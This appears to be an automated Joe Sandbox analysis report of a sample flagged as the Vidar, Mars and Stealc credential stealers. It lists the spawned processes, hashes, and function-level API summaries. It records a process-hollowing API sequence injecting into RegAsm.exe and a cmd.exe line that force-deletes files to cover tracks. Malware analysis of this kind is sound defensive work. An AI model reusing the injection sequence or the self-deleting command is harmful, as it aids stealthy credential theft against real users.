Path:	C:\Users\user\Desktop\w7kdnBzGat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\w7kdnBzGat.exe"
Imagebase:	0x4a0000
File size:	779'264 bytes
MD5 hash:	B4FFEC30ABB0DE7D297EB9B20B7C02E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:52:58
Start date:	27/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc50000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:53:01
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:53:01
Start date:	27/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:53:01
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0xa30000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:53:07
Start date:	27/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268
Imagebase:	0xef0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.1%
Total number of Nodes:	280
Total number of Limit Nodes:	12

Executed Functions

Function 00E1018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00E102FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00E1030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00E1032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E10351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00E1037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00E103D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00E1041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E1045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 00E10499
ResumeThread.KERNELBASE(?), ref: 00E104A8

Strings

GetP, xrefs: 00E1020F
aryA, xrefs: 00E101D3
ress, xrefs: 00E10217
Load, xrefs: 00E101CB

Memory Dump Source

Source File: 00000000.00000002.2240879561.0000000000E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_w7kdnBzGat.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 1e8df0e19b452b780a0e893213244a67c0cfb8df64f98e6ee4eb42422c3fa6e3
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 17B1E57660028AAFDB60CF68CC80BDA77A5FF88714F158524EA1CAB341D774FA41CB94

Function 005222C6 Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1042
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004A1BA5: __EH_prolog3_catch.LIBCMT ref: 004A1BAC

Part of subcall function 004A17AA: GetCurrentThreadId.KERNEL32 ref: 004A17B5

GetNumberOfEventLogRecords.ADVAPI32(00000000,00000000), ref: 005222F0
_Deallocate.LIBCONCRT ref: 0052231E

Strings

SVWj@h, xrefs: 005222D5

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CurrentDeallocateEventH_prolog3_catchNumberRecordsThread
String ID: SVWj@h
API String ID: 4100246090-738278931
Opcode ID: b550ff5367facdf4284718082f758f4a7346e998c0cecc3403b8ff3944970471
Instruction ID: 70ba9654150fbb4a08698bb79c78952f72b2008a53f420a01f665203225440e1
Opcode Fuzzy Hash: b550ff5367facdf4284718082f758f4a7346e998c0cecc3403b8ff3944970471
Instruction Fuzzy Hash: 6CF0D635419321AFC218FB39E80685F7B98EE52724F008A1FF450821D1EB789A05C7E7

Function 00505E5D Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fded67fda22185d370b1c06180ba572b24e40145a3d2ed861f668e9935d19748
Instruction ID: ef72955b76fa8ad8a38e4336be1eaa2893fbacbadf9e85f6623ea5630e0789c8
Opcode Fuzzy Hash: fded67fda22185d370b1c06180ba572b24e40145a3d2ed861f668e9935d19748
Instruction Fuzzy Hash: 03F03032A117249FCF26D748D805A9E7BBCFB49B51F1144A6E545E7190D270EE40CBD0

Function 00505166 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,9496FA04,?,00505273,?,?,?,00000000), ref: 00505227

Strings

api-ms-, xrefs: 005051BD
ext-ms-, xrefs: 005051D1

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: ca5a3f85be8168e540f70373fc178ddd4a51d3dcbb7777e0f30969234f0435c5
Instruction ID: 437c6a0bd8a061d51311abd0b145a58dd0c5faa3db5a74c8bd40d841c67f2de5
Opcode Fuzzy Hash: ca5a3f85be8168e540f70373fc178ddd4a51d3dcbb7777e0f30969234f0435c5
Instruction Fuzzy Hash: F3210875A02622ABCB219760DC45A5F3F68BF52760F150110E956A72D1FB30ED05DED0

Function 004C7CBE Relevance: 6.1, APIs: 4, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___scrt_release_startup_lock.LIBCMT ref: 004C7D14
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 004C7D28
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 004C7D4E
___scrt_uninitialize_crt.LIBCMT ref: 004C7D91

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
String ID:
API String ID: 3089971210-0
Opcode ID: 118f2b80234f77816494c0ccfa054613aa9533b3c29d35b49fe0b37cf974684b
Instruction ID: 777559f64159aaf8a967a2012ec550d5cc342b6b5f41cddc28fcf9b52399ba52
Opcode Fuzzy Hash: 118f2b80234f77816494c0ccfa054613aa9533b3c29d35b49fe0b37cf974684b
Instruction Fuzzy Hash: 8721363E108216A7DB643B66AC06F7F6B60AF42728F20042FF442672D2DE6D49058A6C

Function 004C7D0C Relevance: 6.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___scrt_release_startup_lock.LIBCMT ref: 004C7D14
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 004C7D28
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 004C7D4E
___scrt_uninitialize_crt.LIBCMT ref: 004C7D91

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
String ID:
API String ID: 3089971210-0
Opcode ID: c486d872ce69ff36ccc3944b2e08ba1fed4acf2b3c25d12a9b366e127ab8059e
Instruction ID: 71599bdf32df83c1d4a2ee55a0b5971c88661a1b1d89e8678f69b18decc22d24
Opcode Fuzzy Hash: c486d872ce69ff36ccc3944b2e08ba1fed4acf2b3c25d12a9b366e127ab8059e
Instruction Fuzzy Hash: 9501E93E50865557CB757B76A802F7F67609F92728F24046FF4826B2D2DE2E4C01CAAC

Function 004D673E Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,00000001,Function_00036485,00000000,?,?), ref: 004D6787
GetLastError.KERNEL32(?,?,?,004A5737,00000000,00000000,00000001,?,00000000,?,?,?,004A55CD,00000000,Function_0000551E,?), ref: 004D6793
__dosmaperr.LIBCMT ref: 004D679A

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 16b1c269a00fc24181025442036113126b3cb9933abfa25499d49da39214a302
Instruction ID: ecce01d856cc8cf0bbdc3dda856490054798cb76e0295a9a7b3346657bff5d19
Opcode Fuzzy Hash: 16b1c269a00fc24181025442036113126b3cb9933abfa25499d49da39214a302
Instruction Fuzzy Hash: 0601B172600209AFCF159FA1DC26A9F7B79EF00358F11405BF80596350EB78DE11EBA8

Function 004A5662 Relevance: 4.5, APIs: 3, Instructions: 33
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 004A566E
GetExitCodeThread.KERNEL32(?,?), ref: 004A5687
FindCloseChangeNotification.KERNELBASE(?), ref: 004A5699

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ChangeCloseCodeExitFindNotificationObjectSingleThreadWait
String ID:
API String ID: 3816883391-0
Opcode ID: d85aa77b6b4816154d2fb157a7562d513276ef52dc4549763b3f707a30a15c12
Instruction ID: 07061d4f1888ed6aca0b62f89886975cd2e8c205de0aa031000481547c7ddf4f
Opcode Fuzzy Hash: d85aa77b6b4816154d2fb157a7562d513276ef52dc4549763b3f707a30a15c12
Instruction Fuzzy Hash: 6EF0E231500918FBDB208F24CE09A9A3B74EF12730FA40311F925D62E0E334DE56A654

Function 004D65AA Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00504A74: GetLastError.KERNEL32(00000000,?,004DAF64,005040F4,?,?,00504970,00000001,00000364,?,00000003,000000FF,?,004D64AA,005326E8,0000000C), ref: 00504A78
Part of subcall function 00504A74: SetLastError.KERNEL32(00000000), ref: 00504B1A

CloseHandle.KERNEL32(?,?,?,004D67D6,?,?,004D64E3,00000000), ref: 004D65DB
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,004D67D6,?,?,004D64E3,00000000), ref: 004D65F1
ExitThread.KERNEL32 ref: 004D65FA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 10f0f1cfe28d4e40a8c74020c97fc8f7c461a652f4a1ba25479190a94aa5f751
Instruction ID: 7ba1cbdcee1a360505a54db07215e326deaf32cf80245e877a74e9b1a2f6c166
Opcode Fuzzy Hash: 10f0f1cfe28d4e40a8c74020c97fc8f7c461a652f4a1ba25479190a94aa5f751
Instruction Fuzzy Hash: AAF05EB05006027BCB315B75F82CA1F7A996F01320F1A4627F825C63E5DB38DD96DA64

Function 004D6485 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(005326E8,0000000C), ref: 004D6498
ExitThread.KERNEL32 ref: 004D649F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 5d01f7555606cae6762efba6ae55bff9d7bc89dc8d9c43af82241912a993e5c1
Instruction ID: d2ed36f032f1b3c75b07f8fbd94e996a628b0fc73057e67609ab342fbd6811ec
Opcode Fuzzy Hash: 5d01f7555606cae6762efba6ae55bff9d7bc89dc8d9c43af82241912a993e5c1
Instruction Fuzzy Hash: DBF0F975A00205AFDB14ABB0C90BA6E3B34FF81B05F20014EF001873A2DB386A05DFA1

Function 00504105 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,005119F4,?,00000000,?,?,00511D1D,?,00000007,?,?,00512216,?,?), ref: 0050411B
GetLastError.KERNEL32(?,?,005119F4,?,00000000,?,?,00511D1D,?,00000007,?,?,00512216,?,?), ref: 00504126

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: fbe87a976c6ca98db5674b87fc7bf4c49df19ad8c6a805ca86bb7edee03a92f2
Instruction ID: 2ef364b0cd8675d103911efff6ec88e8d96ed5aa0b8a3b770f82c63a3ea60621
Opcode Fuzzy Hash: fbe87a976c6ca98db5674b87fc7bf4c49df19ad8c6a805ca86bb7edee03a92f2
Instruction Fuzzy Hash: 79E0CD715003146BCB213FA5FC0DB897F69AF61796F104066F60CD6161DB788960DB95

Function 00522017 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Deallocate.LIBCONCRT ref: 005220AE

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 414dbc6f93f19f7becd9ac2e975ecab2c1ff310e4af54366f3adb54f16555a48
Instruction ID: 5431cd53a053f11a32229f520c6e69b12ea75aacc16314cfbea4371e6b24bde1
Opcode Fuzzy Hash: 414dbc6f93f19f7becd9ac2e975ecab2c1ff310e4af54366f3adb54f16555a48
Instruction Fuzzy Hash: 1D112B76D002146BDF089F7A98940EFBFB5FFD6310F18866ED85597242D6706A02D750

Function 00505231 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65f18ca6e77f63ef29084dac1f461f8fe01eb3a5ae6a1a986281d47e674e83b
Instruction ID: ac03c481c2b5636875b95e24f92880570375a1b53a82ee53988ae08dee28a3dc
Opcode Fuzzy Hash: e65f18ca6e77f63ef29084dac1f461f8fe01eb3a5ae6a1a986281d47e674e83b
Instruction Fuzzy Hash: 9C01B53B7006125FDB268E69EC48A5F3BE6FFD57607144120FA05DB2D4EA34A8059E90

Function 004C9D04 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,004A1260,?,?,?,?,004A1260,?,00533294), ref: 004C9D64

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9953d6be09bb573c36dffd5064393dd4f84308a881ed6044b03ed5f8e7f6c0be
Instruction ID: f0e33eae7b71b060d47396b8aaece0b48fd3aa31e9e3cef28698732acd669952
Opcode Fuzzy Hash: 9953d6be09bb573c36dffd5064393dd4f84308a881ed6044b03ed5f8e7f6c0be
Instruction Fuzzy Hash: 1801A279A00309ABC7019F58D984F9EBBB8FF55704F15405AED06AB390D774EE01CB90

Function 00509CCC Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,004D6E26,005049DD,?,0050650C,00532D08,00000018,00000003), ref: 00509CFE

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 367cabdc5a3784b7887f18b70789b0d3d8828a8b1a3c0618d2f4c545056f3adb
Instruction ID: e055f04b66fe5ec5a15d1e6428f8602cd6225b0e0ff3ce4e54356eaa9993beb6
Opcode Fuzzy Hash: 367cabdc5a3784b7887f18b70789b0d3d8828a8b1a3c0618d2f4c545056f3adb
Instruction Fuzzy Hash: 5EE02B336403A166E72027269C49B6F3F8DBF923A1F15012ABD1A961D6DF64CC0092E5

Function 004A17AA Relevance: 1.5, APIs: 1, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 004A17B5

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

